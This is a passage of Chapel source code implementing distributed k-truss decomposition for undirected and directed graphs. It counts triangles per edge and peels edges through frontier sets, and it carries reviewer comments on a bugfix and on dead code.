if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each locale only check its owned edges
if (EdgeDeleted[j]==-1) {
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
} //end coforall loc in Locales
RemovedEdge+=SetCurF.getSize();
tmpN2+=1;
SetNextF.clear();
}// end of while
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss,Given K="+k:string +" All Removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTruss
//For undirected graphs, mix the two data-structure methods to search triangles.
//This should be the best-performing variant.
proc kTrussMix(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we first remove the duplicated and cycle edges
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
//writeln("For k=",k," We have removed the edge ",i, "=<",v1,",",v2,">");
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
//we will try to remove all the unnecessary edges in the graph
//while (ConFlag) {
//we should not need the loop for non-naive version
{
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=exactEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
// wedge case i<e, u->v, u->x
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=exactEdge(v,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
var e3=exactEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (i<e3)) {
// cycle case i<e,i<e3, u->v->x->u
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
//EdgeDeleted[tmpe]=1-k;
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
} else {
if (dv2>0) {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTrussMix,Given K="+k:string +" All Removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTrussMix,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTrussMix,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTrussMix,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussMix
//For directed graph, using the naive method. The performance should be bad.
proc kTrussNaiveDirected(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):string throws{
  // Naive k-truss decomposition of a DIRECTED graph.
  //
  // Strategy: run whole passes until a fixed point.  Each pass
  //   (1) recounts, from scratch, the number of triangles supported by
  //       every edge that is still alive (EdgeDeleted[e]==-1), and
  //   (2) deletes (EdgeDeleted[e]=k-1) every live edge whose triangle
  //       count is below k-2.
  // The loop stops when a pass removes nothing.
  //
  // k       : truss parameter; an edge survives iff it supports at least
  //           k-2 triangles among surviving edges.
  // nei     : out-degree of each vertex.
  // start_i : index of each vertex's first out-edge in src/dst.
  // src/dst : edge arrays; a vertex's out-edges are contiguous and its
  //           destinations sorted (binSearchE relies on this).
  // Returns : a "created <attrib>" message after publishing the
  //           EdgeDeleted array through the symbol table st.
  var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
  var SetNextF= new DistBag((int,int),Locales); //kept for symmetry with the non-naive versions; unused here
  var N2=0:int;              // number of peeling passes executed
  var ConFlag=true:bool;     // true while the previous pass removed something
  EdgeDeleted=-1;            // -1 == edge still alive
  var RemovedEdge=0: int;
  var TriCount=makeDistArray(Ne,atomic int);
  // EReverse records, per closing edge e3, the (i,e) pairs of the other two
  // triangle edges.  The naive version fills it but never consumes it; the
  // incremental kTrussDirected version uses the same structure.
  var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
  forall i in TriCount {
    i.write(0);
  }
  var timer:Timer;

  // Mark edge `cur` deleted (EdgeDeleted[cur]=k-1) when an identical edge
  // appears earlier in the edge list, or when u>v and the mirror edge
  // <v,u> exists.  Returns the duplicate's edge ID, or -1 when kept.
  proc RemoveDuplicatedEdges( cur: int):int {
    if ( (cur==0) ) {
      return -1;
    }
    var u=src[cur]:int;
    var v=dst[cur]:int;
    var lu=start_i[u]:int;
    var nu=nei[u]:int;
    var lv=start_i[v]:int;
    var nv=nei[v]:int;
    var DupE:int;
    if ((nu<=1) || (cur<=lu)) {
      DupE=-1;
    } else {
      // search for an earlier copy of <u,v> among u's out-edges
      DupE =binSearchE(dst,lu,cur-1,v);
    }
    if (DupE!=-1) {
      EdgeDeleted[cur]=k-1;
    } else {
      if (u>v) {
        if (nv<=0) {
          DupE=-1;
        } else {
          // search for the mirror edge <v,u>
          DupE=binSearchE(dst,lv,lv+nv-1,u);
        }
        if (DupE!=-1) {
          EdgeDeleted[cur]=k-1;
        }
      }
    }
    return DupE;
  }

  // Given vertices u and v, return the edge ID of <u,v> or <v,u>,
  // or -1 when neither exists (self-loops and out-of-range rejected).
  proc findEdge(u:int,v:int):int {
    if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
      return -1;
      // we do not accept self-loop
    }
    var beginE=start_i[u];
    var eid=-1:int;
    if (nei[u]>0) {
      if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
        // search <u,v> among u's out-edges
        eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
      }
    }
    if (eid==-1) {
      // fall back to the reversed direction <v,u>
      beginE=start_i[v];
      if (nei[v]>0) {
        if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
          eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
        }
      }
    }
    return eid;
  }// end of proc findEdge(u:int,v:int)

  // Given vertices u and v, return the edge ID of exactly <u,v>, or -1.
  proc exactEdge(u:int,v:int):int {
    if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
      return -1;
      // we do not accept self-loop
    }
    var beginE=start_i[u];
    var eid=-1:int;
    if (nei[u]>0) {
      if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
        eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
      }
    }
    return eid;
  }// end of proc exactEdge(u:int,v:int)

  // Preprocessing: drop self-loops and duplicated/mirrored edges.
  {
    var startEdge = 0;
    var endEdge = Ne-1;
    forall i in startEdge..endEdge {
      var v1=src[i];
      var v2=dst[i];
      if ( v1==v2) {
        EdgeDeleted[i]=k-1;
      }
      if (EdgeDeleted[i]==-1) {
        var DupE= RemoveDuplicatedEdges(i);
      }
    }
  }

  timer.start();
  // Peel until a full pass removes nothing.
  while (ConFlag) {
    // ---- step 1: recount triangles for every surviving edge ----
    coforall loc in Locales with ( ref SetNextF) {
      on loc {
        var ld = src.localSubdomain();
        var startEdge = ld.low;
        var endEdge = ld.high;
        forall i in startEdge..endEdge {
          TriCount[i].write(0);
        }
        forall i in startEdge..endEdge {
          var u = src[i];
          var v = dst[i];
          if ((EdgeDeleted[i]==-1) && (u!=v) ) {
            // triangles closed through u's out-neighbours x: u->x, x~v
            var beginTmp=start_i[u];
            var endTmp=beginTmp+nei[u]-1;
            if ( (nei[u]>1) ) {
              forall x in dst[beginTmp..endTmp] {
                var e=findEdge(u,x);//edge ID, to check whether it has been removed
                if (e!=-1) {
                  // (i<e) ensures each triangle is counted from one edge only
                  if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
                    var e3=findEdge(x,v);
                    if (e3!=-1) {
                      if (EdgeDeleted[e3]==-1) {
                        TriCount[i].add(1);
                        TriCount[e].add(1);
                        TriCount[e3].add(1);
                        EReverse[e3].add((i,e));
                      }
                    }
                  }
                }
              }
            }
            // triangles closed through v's out-neighbours x: v->x, x->u
            beginTmp=start_i[v];
            endTmp=beginTmp+nei[v]-1;
            if ( (nei[v]>0) ) {
              forall x in dst[beginTmp..endTmp] {
                var e=findEdge(v,x);
                if (e!=-1) {
                  if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
                    // BUGFIX: close the triangle back to u, not v.  The
                    // acceptance test below requires src[e3]==x and
                    // dst[e3]==u, so findEdge(x,v) could never satisfy it;
                    // this matches the corrected code in kTrussDirected.
                    var e3=findEdge(x,u);
                    if (e3!=-1) {
                      if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
                        TriCount[i].add(1);
                        TriCount[e].add(1);
                        TriCount[e3].add(1);
                      }
                    }
                  }
                }
              }
            }
          }
        }// end of forall. We get the number of triangles for each edge
      }// end of on loc
    } // end of coforall loc in Locales

    // ---- step 2: delete every live edge with support below k-2 ----
    coforall loc in Locales with (ref SetCurF ) {
      on loc {
        var ld = src.localSubdomain();
        var startEdge = ld.low;
        var endEdge = ld.high;
        // each locale only handles the edges owned by itself
        forall i in startEdge..endEdge with(ref SetCurF){
          if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
            EdgeDeleted[i] = k-1;
            SetCurF.add(i);
          }
        }
      }// end of on loc
    } // end of coforall loc in Locales
    // keep iterating only while something was removed this pass
    ConFlag = SetCurF.getSize()>0;
    SetCurF.clear();
    N2+=1;
  }// end while
  timer.stop();

  // Report statistics and publish EdgeDeleted through the symbol table.
  AllRemoved=true;
  var tmpi=0;
  for i in 0..Ne-1 {
    if (EdgeDeleted[i]==-1) {
      AllRemoved=false;
    } else {
      tmpi+=1;
    }
  }
  outMsg="After KTruss Naive Directed,Given K="+k:string+" All Removed="+AllRemoved:string;
  smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
  outMsg="After KTruss Naive Directed,Total execution time="+(timer.elapsed()):string;
  smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
  outMsg="After KTruss Naive Directed,Total number of iterations ="+N2:string;
  smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
  outMsg="After KTruss Naive Directed,Totally remove "+tmpi:string+ " Edges";
  smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
  var countName = st.nextName();
  var countEntry = new shared SymEntry(EdgeDeleted);
  st.addEntry(countName, countEntry);
  var cntMsg = 'created ' + st.attrib(countName);
  return cntMsg;
} // end of proc NaiveKTrussDirected
//For directed graph, the straight forward method.
proc kTrussDirected(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):string throws{
  // k-truss computation for a directed graph, incremental version.
  // EdgeDeleted[e] encodes the edge state: -1 = still alive,
  // 1-k = provisionally removed in the current wave, k-1 = removed for good.
  // Triangles are counted once up front; after that, each removal is
  // propagated to the other two edges of every triangle it supported via
  // the SetCurF/SetNextF frontiers, instead of recounting from scratch.
  // Returns a "created <attrib>" message after publishing EdgeDeleted
  // through the symbol table st.
  var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
  var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
  var N2=0:int;            // number of outer passes executed
  var ConFlag=true:bool;
  EdgeDeleted=-1;          // mark every edge alive
  var RemovedEdge=0: int;
  var TriCount=makeDistArray(Ne,atomic int);
  // EReverse[e3] collects the (i,e) pairs of the other two edges of each
  // triangle closed by e3, so removing e3 can decrement them later.
  var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
  forall i in TriCount {
    i.write(0);
  }
  var timer:Timer;
  // Mark edge `cur` deleted (k-1) when an identical edge appears earlier
  // in the list, or when u>v and the mirror edge <v,u> exists.
  // Returns the duplicate's edge ID, or -1 when `cur` is kept.
  proc RemoveDuplicatedEdges( cur: int):int {
    //if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
    if ( (cur==0) ) {
      return -1;
    }
    var u=src[cur]:int;
    var v=dst[cur]:int;
    var lu=start_i[u]:int;
    var nu=nei[u]:int;
    var lv=start_i[v]:int;
    var nv=nei[v]:int;
    var DupE:int;
    if ((nu<=1) || (cur<=lu)) {
      DupE=-1;
    } else {
      // look for an earlier copy of <u,v> among u's out-edges
      DupE =binSearchE(dst,lu,cur-1,v);
    }
    if (DupE!=-1) {
      EdgeDeleted[cur]=k-1;
    } else {
      if (u>v) {
        if (nv<=0) {
          DupE=-1;
        } else {
          // look for the mirror edge <v,u>
          DupE=binSearchE(dst,lv,lv+nv-1,u);
        }
        if (DupE!=-1) {
          EdgeDeleted[cur]=k-1;
        }
      }
    }
    return DupE;
  }
  // given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
  proc findEdge(u:int,v:int):int {
    //given the destination array, the edge range [l,h], return the edge ID e where ary[e]=key
    if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
      return -1;
      // we do not accept self-loop
    }
    var beginE=start_i[u];
    var eid=-1:int;
    if (nei[u]>0) {
      if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
        eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
        // search <u,v> in undirect edges
      }
    }
    if (eid==-1) {// if b
      beginE=start_i[v];
      if (nei[v]>0) {
        if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
          eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
          // search <v,u> in undirect edges
        }
      }
    }// end of if b
    return eid;
  }// end of proc findEdge(u:int,v:int)
  // given vertices u and v, return the edge ID e=<u,v> (exact direction only)
  proc exactEdge(u:int,v:int):int {
    //given the destination array, the edge range [l,h], return the edge ID e where ary[e]=key
    if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
      return -1;
      // we do not accept self-loop
    }
    var beginE=start_i[u];
    var eid=-1:int;
    if (nei[u]>0) {
      if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
        eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
        // search <u,v> in undirect edges
      }
    }
    return eid;
  }// end of proc exatEdge(u:int,v:int)
  //here we begin the first naive version
  //coforall loc in Locales {
  // on loc {
  // Preprocessing: remove self-loops and duplicated/mirrored edges.
  {
    {
      //var ld = src.localSubdomain();
      //var startEdge = ld.low;
      //var endEdge = ld.high;
      var startEdge = 0;
      var endEdge = Ne-1;
      forall i in startEdge..endEdge {
        var v1=src[i];
        var v2=dst[i];
        if ( v1==v2) {
          EdgeDeleted[i]=k-1;
          //writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
        }
        if (EdgeDeleted[i]==-1) {
          var DupE= RemoveDuplicatedEdges(i);
          if (DupE!=-1) {
            //we find duplicated edge
          }
        }
      }
    }
  }// end of coforall loc
  //writeln("After Preprocessing");
  timer.start();
  //we will try to remove all the unnecessary edges in the graph
  // NOTE(review): ConFlag is set to false below and never reset to true,
  // so this outer while executes exactly one pass; all further peeling is
  // done by the inner SetCurF/SetNextF propagation loop.
  while (ConFlag) {
    //ConFlag=false;
    // first we calculate the number of triangles
    coforall loc in Locales with ( ref SetNextF) {
      on loc {
        var ld = src.localSubdomain();
        var startEdge = ld.low;
        var endEdge = ld.high;
        forall i in startEdge..endEdge {
          TriCount[i].write(0);
        }
        //forall i in startEdge..endEdge with(ref SetCurF){
        forall i in startEdge..endEdge {
          var u = src[i];
          var v = dst[i];
          var du=nei[u];
          var dv=nei[v];
          {
            // triangles closed through u's out-neighbours x
            var beginTmp=start_i[u];
            var endTmp=beginTmp+nei[u]-1;
            if ((EdgeDeleted[i]==-1) && (u!=v) ){
              if ( (nei[u]>1) ){
                //forall x in dst[beginTmp..endTmp] with (ref uadj) {
                forall x in dst[beginTmp..endTmp] {
                  var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
                  if (e==-1){
                    //writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
                  } else {
                    // (i<e) makes a single edge responsible for each triangle
                    if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
                      var e3=findEdge(x,v);
                      if (e3!=-1) {
                        if (EdgeDeleted[e3]==-1) {
                          TriCount[i].add(1);
                          TriCount[e].add(1);
                          TriCount[e3].add(1);
                          EReverse[e3].add((i,e));
                        }
                      }
                    }
                  }
                }
              }
            }
            // triangles closed through v's out-neighbours x (x->u closes it)
            beginTmp=start_i[v];
            endTmp=beginTmp+nei[v]-1;
            if ((EdgeDeleted[i]==-1) && (u!=v) ){
              if ( (nei[v]>0) ){
                //forall x in dst[beginTmp..endTmp] with (ref vadj) {
                forall x in dst[beginTmp..endTmp] {
                  var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
                  if (e==-1){
                    //writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
                  } else {
                    if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
                      //var e3=findEdge(x,v);
                      var e3=findEdge(x,u);
                      if (e3!=-1) {
                        if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
                          TriCount[i].add(1);
                          TriCount[e].add(1);
                          TriCount[e3].add(1);
                        }
                      }
                    }
                  }
                }
              }
            }
          }// end of if du<=dv
        }// end of forall. We get the number of triangles for each edge
      }// end of on loc
    } // end of coforall loc in Locales
    // NOTE(review): the following coforall has an empty forall body — it is
    // dead code and a candidate for removal.
    coforall loc in Locales with (ref SetCurF ) {
      on loc {
        var ld = src.localSubdomain();
        var startEdge = ld.low;
        var endEdge = ld.high;
        forall i in startEdge..endEdge with(ref SetCurF){
        }
      }// end of on loc
    } // end of coforall loc in Locales
